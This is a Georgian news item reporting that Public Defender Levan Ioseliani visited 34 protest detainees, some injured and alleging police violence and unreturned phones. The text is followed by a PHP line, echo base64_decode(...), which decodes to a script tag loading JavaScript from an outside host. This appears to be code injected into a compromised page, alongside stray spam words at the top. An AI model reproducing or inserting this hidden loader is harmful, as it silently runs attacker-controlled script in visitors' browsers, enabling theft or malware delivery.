tube
ავერსი jaluzi

საქართველოს სახალხო დამცველმა ლევან იოსელიანმა თბილისსა და საგარეჯოში მდებარე დროებითი მოთავსების იზოლატორში აქციაზე დაკავებული 34 პირი მოინახულა.

ამის შესახებ ინფორმაციას ომბუდსმენის აპარატი ავრცელებს.

მათივე ცნობით, დაკავებულთა ნაწილს აღენიშნებოდათ დაზიანებები და როგორც თავად აცხადებენ, პოლიცია მათზე დაკავებისა და ტრანსპორტირების დროს ძალადობდა.

„ყველა ფაქტის შესახებ ინფორმაცია სახალხო დამცველმა სპეციალურ საგამოძიებო სამსახურს მიაწოდა.

სახალხო დამცველმა ხაზი გაუსვა, რომ შინაგან საქმეთა სამინისტრომ ასევე, ყურადღება უნდა მიაქციოს სამართალდამცავთა მხრიდან დაკავებულთა ნივთების დაკარგვის საკითხს, ვინაიდან დაკავებულთა ნაწილი მიუთითებს, რომ პოლიცია დაკავების დროს ჩამორთმეულ ტელეფონებსა და სხვა პირად ნივთებს აღარ უბრუნებს“, - აღნიშნულია გავრცელებულ ინფორმაციაში.

53
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");